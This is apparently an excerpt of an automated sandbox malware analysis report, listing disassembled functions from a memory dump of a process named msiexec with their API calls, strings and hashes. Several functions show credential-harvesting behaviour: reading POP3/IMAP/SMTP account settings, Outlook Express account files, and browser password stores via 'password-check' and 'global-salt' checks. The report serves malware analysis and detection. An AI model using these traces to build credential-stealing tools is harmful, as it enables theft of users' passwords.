                                                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3642520215-0
                                                                                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1999381814-0
                                                                                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __aulldvrm$__aullrem
                                                                                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                • API String ID: 643879872-978417875
                                                                                                                                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040810E
                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CD7B60,?), ref: 004081B9
                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                • API String ID: 524865279-2190619648
                                                                                                                                                • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                                                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                                                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 2300387033-3849865405
                                                                                                                                                • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004076D7
                                                                                                                                                • sprintf.MSVCRT ref: 00407704
                                                                                                                                                • strlen.MSVCRT ref: 00407710
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                • strlen.MSVCRT ref: 00407733
                                                                                                                                                • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                • API String ID: 3756086014-1363028141
                                                                                                                                                • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 125969286-791839006
                                                                                                                                                • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                • String ID: ACD
                                                                                                                                                • API String ID: 82305771-620537770
                                                                                                                                                • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004091EC
                                                                                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                • String ID: caption$dialog_%d
                                                                                                                                                • API String ID: 2923679083-4161923789
                                                                                                                                                • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                • memset.MSVCRT ref: 00410246
                                                                                                                                                • memset.MSVCRT ref: 00410258
                                                                                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                • memset.MSVCRT ref: 0041033F
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3974772901-0
                                                                                                                                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 577244452-0
                                                                                                                                                • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
